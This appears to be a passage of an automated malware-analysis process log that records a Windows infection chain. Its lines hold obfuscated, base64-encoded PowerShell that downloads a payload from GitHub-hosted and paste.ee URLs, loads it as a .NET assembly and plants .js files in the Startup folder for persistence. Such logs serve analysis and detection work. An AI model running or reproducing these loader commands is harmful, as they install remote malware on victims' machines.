tAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2x_bee.js.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\Public\Documents\2x_bee.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 